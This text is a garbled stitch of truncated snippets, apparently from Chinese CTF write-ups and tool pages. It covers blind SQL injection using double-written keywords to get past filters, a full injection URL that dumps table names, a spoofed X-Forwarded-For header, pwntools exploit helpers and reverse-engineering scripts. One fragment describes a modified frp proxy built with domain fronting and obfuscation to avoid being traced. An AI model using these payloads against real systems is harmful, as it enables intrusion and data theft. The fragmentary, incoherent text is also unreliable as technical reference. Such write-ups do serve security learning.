id=aaa'oorr(1=1)='1 //返回You are in id=aaa'oorr(1=2)='1 //返回You are not in // 此处的aaa是为了让前边条件为假,那么sql语句的判断将依赖于后边的语句 // 即:false ∪ (条件一) = 条件一 我们先判断数据库长度: id=aaa'oorr(length(database())>1)='1 ...
BLX Label:就是BL + BX指令共同作用的效果。 位运算命令:and orr eor分别是 按位与、或、异或。 aarch64和arm架构相比,还是有一些汇编指令上的区别的: 首先仍是寄存器,在64位下都叫作Xn寄存器了,其对应的低32位叫作Wn寄存器,其中栈顶是X31(SP)寄存器,栈帧是X29(FP)寄存器,X0 ~ X7用来依次传递参数,X0...
from z3 import * xorr = [BitVec("num[%d]" % i, 32) for i in range(4)] s = Solver() s.add(xorr[0] * 256 - xorr[1] / 2 + xorr[2] * 23 + xorr[3] / 2 == 47118166) s.add(xorr[0] * 252 - xorr[1] * 366 + xorr[2] * 23 + xorr[3] / 2 - 1987 ...
SQL注入题,此题过滤掉了一些危险关键字,使用双写绕过即可,如or关键字,双写为:oorr。 查表名: /check.php?username=1%27unioorn%20selecort%201,2,group_concat(table_name)%20froorm%20infoorrmation_schema.tables%20wheorre%20table_schema=database()%23&password=1 差列名: /check.php?username=1%27...
基于frp-0.58.1魔改二开,随机化socks5账户密码及端口、钉钉上线下线通知、配置文件oss加密读取、域前置防止溯源、源码替换/编译混淆等 - frp/go.sum at main · CTF-MissFeng/frp
关键字符,双击跟进,ctrl+x查看引用的地方,再反汇编 纯写脚本逆向题 #include<stdio.h>#include<string.h>int main(){char v[30]={0};char a[]="]P_ISRF^PCY[I_YWERYC";int n=strlen(a);for(int i=strlen(a)-1;i>=0;--i){v[n-i-1]=a[i];}for(int i=0;i<n;++i){if(v[i]=...
{5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(\';\');5 e="";o(i=0;i<8....
[1])ru=lambdax:p.recvuntil(x)sn=lambdax:p.send(x)rl=lambda:p.recvline()sl=lambdax:p.sendline(x)rv=lambdax:p.recv(x)sa=lambdaa,b:p.sendafter(a,b)sla=lambdaa,b:p.sendlineafter(a,b)deflg(s,addr):log.critical("{} -> {}".format(s,hex(addr)))defraddr(a=6):if(a==6...
完整的伪造后请求头如下,奇怪的是,X-Forwarded-For 字段置于尾部会造成 400 错误。应该是被认出来是假的了吧。 代码语言:javascript 复制 GET/Secret.phpHTTP/1.1Host:node4.buuoj.cn:26361X-Forwarded-For:127.0.0.1Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:SycloverAccept:text/html,appli...
id=aaa'oorr(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))from(1)foorr(1))='a')='1 之后就不写了,与上边类似,写脚本跑就好。 2|50x05 你真的会PHP吗? 简单概括: 考点:is_numeric函数的绕过(%20|%00)、PHP32位系统整数型变量最大...